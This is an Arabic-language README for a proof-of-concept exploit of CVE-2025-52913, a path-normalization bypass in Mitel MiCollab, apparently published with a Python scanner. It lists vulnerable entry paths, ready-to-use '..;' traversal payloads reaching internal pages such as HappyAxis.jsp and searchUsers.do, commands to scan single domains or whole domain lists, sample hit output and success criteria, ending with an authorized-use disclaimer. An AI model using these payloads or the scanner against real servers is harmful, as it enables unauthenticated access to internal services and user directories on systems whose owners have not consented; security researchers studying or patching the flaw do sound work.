
إثبات مفهوم (PoC) لثغرة CVE-2025-52913، وهي ثغرة في تطبيع المسارات تؤثر على Mitel MiCollab.
يحتوي هذا المستودع على إثبات للمفهوم (PoC) لثغرة CVE-2025-52913، وهي ثغرة في تطبيع المسار تؤثر على Mitel MiCollab.
تسمح المشكلة للمهاجمين غير المصادق عليهم بتجاوز قيود المسار المقصودة من خلال استغلال تسلسلات URL مصممة بعناية مثل ..;، مما يؤدي إلى الوصول إلى نقاط نهاية تطبيقات داخلية.
قد يسمح الاستغلال الناجح بما يلي:
يمكن تشغيل الثغرة عبر المسارات التالية:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
أمثلة على حمولات العبور (traversal):
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
من المرجح أن يكون الهدف عرضة للثغرة إذا:
استجاب الخادم برمز HTTP 200
احتوت الاستجابة على:
Axis2Axis2 Happiness Pageتنشأ الثغرة من التطبيع غير السليم للمسارات المصممة بعناية التي تحتوي على ..;، مما يسمح بتجاوز سياق التطبيق المقصود.
يمكن أن يؤدي هذا السلوك إلى كشف خدمات داخلية مثل:
اكتُشف بواسطة Dahmani Toumi
هذا المشروع مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط.
لا تستخدم هذه الأداة ضد الأنظمة دون إذن صريح. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.